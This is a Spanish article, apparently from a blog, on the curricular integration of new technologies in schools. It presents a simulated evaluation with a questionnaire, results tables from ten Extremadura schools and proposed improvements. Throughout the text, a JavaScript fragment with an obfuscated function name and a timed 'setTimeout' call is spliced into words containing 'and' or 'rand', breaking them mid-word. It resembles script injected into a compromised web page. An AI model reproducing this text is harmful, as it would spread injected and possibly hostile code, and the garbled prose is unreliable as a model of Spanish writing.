LA INTEGRACIÓN CURRICULAR DE LAS NUEVAS TECNOLOGÍAS

Autora: Milagros García Habernau

INTRODUCCIÓN

            Este articulo consiste en una simulación basada en el modelo de evaluación de GRIDS (Guidelines for Review andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Internal Development in Schools) que valora el empleo inadecuado de las nuevas tecnologías en  los centros educativos.

             El primer paso para clarificar el tema al que nos vamos a referir sería precisar qué vamos a englobar bajo el epígrafe de “Nuevas Tecnologías”.  El término Nuevas Tecnologías hace referencia a todos aquellos equipos o sistemas técnicos que sirven de soporte a la información, a través de canales visuales, auditivos o de ambos.  Todas las tecnologías – ordenadores, CD-ROM, pantallas líquidas, vídeo interactivo, etc. – tienen grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes posibilidades dentro de la educación y formación de los alumnos. De hecho, aumentan las posibilidades hasta donde la imaginación y la técnica puedan llegar. Sin embargo, su implantación y uso en los centros educativos demuestran que no siempre se obtienen los resultados deseados. En esta simulación de evaluación intentaremos indagar el empleo inadecuado que, en muchas ocasiones, se está realizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sobre estos instrumentos y abordaremos los factores que están influyendo en nuestro objeto de estudio, siempre con la meta de buscar opciones de mejora que permitan obtener todas las ventajas que estos medios nos ofrecen. En definitiva, se trata de conseguir que la tecnología solucione problemas reales de educación, no que constituya un problema en sí misma o que la inadecuada aplicación de los diferentes medios los convierta en una moda pasajera, perdiéndose así una excelente oportunidad para la enseñanza.

 

 FASE 1: RECOGIDA DE INFORMACIÓN:


Factores implicados en el empleo inadecuado de las nuevas tecnologías en los centros educativos

          La influencia, en el mundo de la educación, de las nuevas tecnologías en general, y de los ordenadores en particular, puede concretarse en dos aspectos básicos siguiendo a Díaz y Batanero (1985): En primer lugar, la enseñanza de conocimientos y destrezas referentes al mundo de los ordenadores y la informática en general; en segundo, la utilización de las tecnologías de la información y la comunicación (de ahora en adelante T.I.C.) como recurso didáctico en la enseñanza de las distintas áreas del currículum. Para una clase de personas cada vez más amplia -científicos y  educadores- la utilización de los microordenadores, los CD-Rom, etc. como instrumentos didácticos va a significar (y está significandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando) una importante revolución en los modos de aprendizaje de todos los niveles del sistema educativo. Las razones para esta afirmación están en que esta nueva tecnología educativa facilita la puesta en práctica de dos principios pedagógicos de máximo interés, como son los de actividad e individualización, a través del uso de elementos tales como los programas interactivos.

           No obstante, en el empleo de las nuevas tecnologías en la educación no todo son ventajas. Existen críticas y recelos que no pueden ignorarse y es preciso analizar estos factores y tratar de encontrarles solución. Entre esos factores  destaco el de  la falta de integración curricular de las nuevas tecnologías.


  

FASE 2: LA INTEGRACIÓN CURRICULAR DE LAS NUEVAS TECNOLOGÍAS

            Si seguimos a Escudero (citado por Reparaz, Sobrino y Mir, 1995), la relación que se debe establecer entre las nuevas tecnologías y la educación debe ser integradora y no aditiva. Este autor propone dar primacía a lo curricular, a los valores y significados, sobre los medios; de manera que sean los proyectos educativos los que reclamen los medios y no a la inversa.

            Tenemos que tener claro que nos movemos en un contexto escolar, por lo que se trata de apostar por una innovación educativa y no técnica. Esto  exige una profunda reflexión sobre las posibilidades de las nuevas tecnologías como medio de desarrollo curricular, reflexionandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sobre cuestiones tales como las metas y propósitos de su uso, así como parámetros tales como cuándo, dónde, cómo, por qué y para quién. De lo contrario, se reducirán las posibilidades de intervención con estas herramientas en determinados ámbitos, materiales o alumnos. Los mismos autores nos informan de la importancia de una adecuada integración de las nuevas tecnologías a nivel curricular; pero ¿qué está ocurriendo en nuestros centros educativos? A lo largo de la evaluación intentaremos dar respuesta a esta pregunta.

           Una integración curricular de las nuevas tecnologías ha de reflejarse en los distintos documentos del centro escolar, los cuales van a definir su funcionamiento, finalidades, los objetivos a trabajar, etc. Veamos como estos documentos pueden reflejar y promocionar un uso pedagógico de estos instrumentos. Para empezar, como sabemos, el Proyecto Educativo de Centro (P.E.C.) es el documento que recoge la planificación del centro y expresa los planteamientos educativos generales, la filosofía escolar que asume toda la comunidad educativa. En relación a los medios tecnológicos, este documento puede contemplar varias cuestiones tales como:

  • Determinación de aulas o espacios reservados para la ubicación del material tecnológico.
  • Organización de los recursos humanos en función de las características del centro: desdoblamiento de grupos, formación interna del profesorado en materia de nuevas tecnologías.
  • Definición de funciones de las personas responsables de los medios tecnológicos: utilización de los medios tecnológicos en actividades de enseñanza-aprendizaje, administración de los recursos económicos, realización de horarios para utilizar los medios, cuidado de su mantenimiento, elaboración de las normas de uso, petición de los materiales a la administración, etc.; tiempo de dedicación de las personas responsables de los medios tecnológicos para el desarrollo de las funciones que le han sido asignadas…

           En el siguiente nivel de concreción curricular encontramos documentos tales como el Proyecto Curricular de Centro (P.C.C.) y el Proyecto Curricular de Etapa (P.C.E.). Ambos deben reflejar decisiones relativas al uso de los materiales tecnológicos en el aula como instrumentos capaces de potenciar la adquisición de determinados contenidos del currículo. Un escalón más en la concreción curricular lo encontramos en las Programaciones de aula. Estas son elaboradas por los profesores y se componen de unidades didácticas secuenciadas en las que los recursos tecnológicos deben ser uno de los medios didácticos para la consecución de algunos de los objetivos educativos. Deben integrarse plenamente en el currículo. 


  

INSTRUMENTO PARA EVALUAR LA INTEGRACIÓN CURRICULAR DE LAS NUEVAS TECNOLOGÍAS:  

            Como venimos diciendo a lo largo de este artículo, las nuevas tecnologías han de estar integradas en el currículo del centro y se ha de realizar un uso pedagógico  educativo de las mismas.

             Para evaluar el nivel de integración de las nuevas tecnologías vamos a utilizar un cuestionario que ha de ser rellenado de forma conjunta por el equipo directivo y/o el coordinador de las de las TIC del centro (si el colegio o instituto cuenta con esta figura). Con el cuestionario se busca recoger información sobre el factor que estamos estudiandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando de forma ordenada. Del cuestionario origen (del que hablaremos a continuación) hemos seleccionado una serie preguntas, pues en los cuestionarios el evaluador es el que previamente determina qué cuestiones se van a utilizar.

             Para determinar las preguntas a usar, normalmente se realiza un primer cuestionario de prueba que se aplica a un número significativo de sujetos; del análisis de este cuestionario saldrá el que realmente se utilice en la investigación. El cuestionario origen se denomina “Estudio de las Tecnologías de la información y la comunicación en centros educativos: Cuestionario del equipo Directivo y/o Coordinador/a de las TIC” (denominado de forma abreviada CC-TICS). Este cuestionario es uno de los elementos que está utilizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el Instituto de Evaluación y Asesoramiento Educativo (I.D.E.A.) para hacer un estudio acerca de la implantación de la sociedad de la información en los centros educativos. En nuestro artículo, vamos a realizar un análisis a nivel particular (ajeno al Instituto I.D.E.A.) de las preguntas escogidas para evaluar el factor que estamos tratandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando.

           Para evaluar la integración curricular de las nuevas tecnologías vamos a utilizar solo algunas de las preguntas del CC-TICS, más concretamente las cuestiones número 25, 29, 32, 33, 34 y 36 que aparecen en el Anexo 1 de dicho cuestionario. En este artículo las expondremos en un orden que nos parece más acorde para nuestro estudio y le daremos una nueva numeración.


 

PREGUNTAS PARA EVALUAR LA INTEGRACIÓN CURRICULAR DE LAS NUEVAS TECNOLOGÍAS (obtenidas del Cuestionario CC-TICS):

1.- ¿En el proyecto educativo, proyecto curricular o en los documentos de planificación del centro hay alguna mención específica a las TIC? (Pregunta 34 del cuestionario)

2.- ¿Tiene el centro o participa en algún proyecto educativo específicamente centrado en las TIC? (Pregunta 32 del cuestionario).

3.- ¿Participa en este proyecto todo el profesorado del centro? (Pregunta 33 del cuestionario).

4.- ¿Hay coordinador/a TIC en su centro o alguna persona responsable de las tecnologías de la información y la comunicación? (Pregunta 25 del cuestionario).

5.- ¿En qué momento adquirió el coordinador/a o responsable de las TIC la formación de carácter didáctico en tecnologías de la información y la comunicación? Indique con una cruz la opción u opciones que mejor se ajuste en su caso (Pregunta 29 del cuestionario):

  •  
    • En la formación inicial de licenciatura o diplomatura
    • En la formación de postgrado en la Universidad
    • En la formación permanente del profesorado

(En esta pregunta nosotros añadiríamos la opción de “Autodidacta”, pues se ha podido aprender de la propia curiosidad y mediante un trabajo no reglado, ni institucionalizado. Sin embargo, como vamos a utilizar algunos de los datos obtenidos con este cuestionario, no se tendrá presenta esta opción).

6.- En su centro, ¿cuáles son los principales obstáculos que dificultan la incorporación de las tecnologías con fines educativos? Marque con una cruz las tres opciones prioritarias (Pregunta 36 del cuestionario):

  •  
    • Falta de recursos tecnológicos disponibles en el centro
    • Bajo nivel de formación del profesorado en las TIC
    • Escasa motivación por parte del profesorado
    • Carencia de recursos educativos digitales
    • Falta de personal cualificado en TIC en el centro
    • Falta de disponibilidad de tiempo del profesorado para dedicar a las TIC
    • Falta de asesoramiento para el uso de las TIC dentro del área curricular de cada docente
    • El perfil problemático del alumno
    • La dispersión de la información en Internet

 

  FASE 3: ANÁLISIS Y VALORACIÓN DE LOS RESULTADOS OBTENIDOS

            Como mencionamos en el punto anterior, el instrumento escogido para analizar el factor de integración curricular de las nuevas tecnologías es una selección de preguntas obtenidas del cuestionario CC-TICS, del Instituto de Evaluación y Asesoramiento Educativo (I.D.E.A.).

             El primer proceso fue escoger los centros que iban a responder a los cuestionarios. Para ello se seleccionaron cinco centros de Educación Primaria y cinco centros de Educación Secundaria al azar, con el  único punto en común de que todos pertenecen a nuestra Comunidad Autónoma (Extremadura) y que todos son centros públicos. Tenemos claro que esta muestra es escasa para obtener unos resultados válidos, pero sí nos sirve en nuestro simulacro de evaluación para dar a conocer la metodología que podríamos seguir.

           Siguiendo el proceso, y una vez escogidos los centros, se mandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda una carta dandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando a conocer nuestro estudio y especificandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando una fecha aproximada de cuándo se van a llevar a efecto los cuestionarios. Dado que el cuestionario es corto, se decide que se mandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andará por correo ordinario o por e-mail (según escoja el centro) y que serán enviados de vuelta en un plazo de tres días.

           Una vez hemos recopilado todo el material, empezamos el análisis. Lo primero es hacer un recuento de los resultados obtenidos y los expresamos en tablas para que nos sea más fácil manejar la información, tal y como podemos ver a continuación:

  RESULTADOS DE LOS CUESTIONARIOS

Factor: Integración Curricular de las nuevas tecnologías

 PREGUNTA 1.- ¿En el proyecto educativo, proyecto curricular o en los documentos de planificación del centro hay alguna mención específica a las TIC? Resultados:

  Primaria  

Secundaria  

TOTAL  

Sí  

5  

5  

10  

No  

0  

0  

0  

 

PREGUNTA 2.- ¿Tiene el centro o participa en algún proyecto educativo específicamente centrado en las TIC? Resultados:

  Primaria  

Secundaria  

TOTAL  

Sí  

1  

2  

3  

No  

4  

3  

7  

 PREGUNTA 3.- ¿Participa en este proyecto todo el profesorado del centro? Resultados:

  Primaria  

Secundaria  

TOTAL  

Sí  

0  

0  

0  

No  

5  

5  

10  

PREGUNTA 4.- ¿Hay coordinador/a TIC en su centro o alguna persona responsable de las tecnologías de la información y la comunicación? Resultados:

  Primaria  

Secundaria  

TOTAL  

Sí  

4  

5  

9  

No  

1  

0  

1  

 PREGUNTA 5.- ¿En qué momento adquirió el coordinador/a o responsable de las TIC la formación de carácter didáctico en tecnologías de la información y la comunicación? (Indique con una cruz la opción u opciones que mejor se ajuste en su caso).  Resultados:

  Primaria  

Secundaria  

TOTAL  

En la formación inicial de licenciatura o diplomatura  

0  

0  

0  

En la formación de postgrado en la Universidad  

0  

0  

0  

En la formación permanente del profesorado  

2  

5  

7  

*(3 centros de Primaria no contestan ninguna de las tres opciones)  

 PREGUNTA 6.- ¿En su centro, cuáles son los principales obstáculos que dificultan la incorporación de las tecnologías con fines educativos? (Marque con una cruz las tres opciones prioritarias). Resultados:

  Primaria  

Secundaria  

TOTAL  

Falta de recursos tecnológicos disponibles en el centro  

1  

0  

1  

Bajo nivel de formación del profesorado en las TIC  

5  

5  

10  

Escasa motivación por parte del profesorado  

2  

2  

4  

Carencia de recursos educativos digitales  

0  

1  

1  

Falta de personal cualificado en TIC en el centro  

1  

0  

1  

Falta de disponibilidad de tiempo del profesorado para dedicar a las TIC  

4  

3  

7  

Falta de asesoramiento para el uso de las TIC dentro del área curricular de cada docente  

2  

2  

4  

El perfil problemático del alumno  

1  

0  

1  

La dispersión de la información en Internet  

1  

0  

1  

           Una vez que tenemos los resultados, vamos a llevar a cabo un análisis descriptivo de los datos en el que se calculen los porcentajes, es decir, en qué tanto por ciento ese hecho está influyendo en la integración educativa de las nuevas tecnologías.

           Asimismo, hacemos análisis comparativos entre los resultados obtenidos en primaria frente a los de secundaria, pues en Extremadura, por el impulso que se dio en los institutos al ofrecer un ordenador por cada dos alumnos, puede que dichas etapas no estén viviendo la misma realidad en la integración de las TIC. Aquí exponemos los resultados:

           Pregunta 1: Mención específica de las TIC en el proyecto curricular o en los documentos de planificación del centro. De los centros encuestados, todos mencionan las TIC en sus documentos de planificación. Este podría ser un primer paso positivo a la hora de una integración adecuada de las nuevas tecnologías, siempre y cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la integración no solo consista en la mención de estos elementos en una serie de documentos.

           Pregunta 2: Participación del centro en algún proyecto educativo específicamente centrado en las TIC. En esta pregunta las respuestas no son tan aplastantes como en la pregunta anterior; aún así, es mayor el porcentaje de centros que participan en proyectos relacionados con las TIC, más aún si nos encontramos en un contexto de educación secundaria.

           Pregunta 4: Existencia de un coordinador/a TIC en el centro o alguna persona responsable de las tecnologías de la información y la comunicación.  La mayoría de centros cuentan con este elemento, especialmente en secundaria, donde todos los centros evaluados dicen tener esta figura, puesto que se cree que un especialista en nuevas tecnologías puede contribuir a una integración adecuada de las TIC a nivel curricular.

          Pregunta 5: Manera en que el coordinador/a o responsable de las TIC adquirió la formación de carácter didáctico en tecnologías de la información y la comunicación. Con esta pregunta pretendemos averiguar en qué medida el responsable de las TIC adquiere formación a nivel del uso educativo de estos elementos. La respuesta con mayor porcentaje es la correspondiente a la formación permanente del profesorado, que, por definición, está ligada al entorno educativo. Podría ser interesante hacer un estudio del enfoque que siguen los cursos de este carácter.

          Pregunta 6: Principales obstáculos que dificultan la incorporación de las tecnologías con fines educativos en los centros escolares e institutos de Extremadura. La integración curricular de las nuevas tecnologías no solo hace referencia a la inclusión de las TIC en el currículo del centro, sino también a su uso con un fin pedagógico. En está última pregunta pretendemos averiguar cuáles son las barreras que están dificultandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el uso de las nuevas tecnologías en los centros, puesto que, sabiendo las dificultades, nos será más sencillo encontrar soluciones. Además, tenemos presente que estamos realizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando una evaluación formativa encaminada a la mejora del objeto evaluado.

 

FASE 4: EMISIÓN DE UN JUICIO DE VALOR

          En conclusión, una de las causas principales del problema de la integración inadecuada de las nuevas tecnologías en los centros educativos es la falta de integración curricular de las nuevas tecnologías.

 

  FASE 5: TOMA DE DECISIONES DE MEJORA

Toma de decisiones de mejora  

Priorización  

1.- Cursos de formación específica del profesorado que desarrollen el uso de las nuevas tecnologías atendiendo a las diferentes áreas o asignaturas y respetandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando las diferentes etapas educativas.  

1  

2.- Cursos de formación dirigidos a los equipos directivos de los centros para el fomento del uso de las TIC (que sea un equipo implicado en la integración de las TIC: desde su inclusión en los documentos del centro hasta su puesta en práctica en el aula). Buscamos motivar al claustro en el uso de estas tecnologías.  

2  

3.- Distribución de horas lectivas dentro de la jornada laboral para el desarrollo y preparación, por parte del profesorado, de actividades que puedan desarrollar con las nuevas tecnologías en su aula, así como tiempo para poder llevar a cabo unidades de apoyo y de ampliación de los conocimientos a través de las TIC en la clase.  

1  

4.- Creación de premios que impliquen al profesorado del centro y que fomenten el uso y aplicación de estos elementos de una forma eficaz y a la vez sirvan de intercambio de experiencias en este contexto.  

3  

5.- Hacer saber a las editoriales de la posible utilidad de materiales específicos (Software que acompañen al libro de texto y que lo complementen con actividades específicas para cada unidad: actividades de ampliación, repaso y evaluación por unidades y materias).  

3  

 

  Bibliografía:

  • Díaz, J., & Batanero, M.C. (1985). Microordenadores en la escuela. Jaén.
  • Salomón, C. (1987). Entornos de aprendizaje con ordenadores. Barcelona: Paidós.
  • Medrano, G. (1993). Nuevas tecnologías en la formación. Madrid: Eudema.
  • Reparaz, CH., Sobrino, A. & Mir, J.I. (2000). Integración curricular de las nuevas tecnologías. Barcelona: Arial Practicum.
  • Rangel, M.M. (2003). Las nuevas tecnologías en la formación del profesorado de educación infantil y primaria. Badajoz: Cultural Santa Ana.
  •  http://dewey.uab.es/pmarques/funcion.htm
  • http://www.uoc.es/web/esp/articles/joan_majo.html
  • Estudio de las Tecnologías de la información y la comunicación en centros educativos 2006 del Instituto de Evaluación y Asesoramiento Educativo (I.D.E.A.): Cuestionario del equipo Directivo y/o Coordinador/a de las TIC” (denominado de forma abreviada CC-TICS).

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.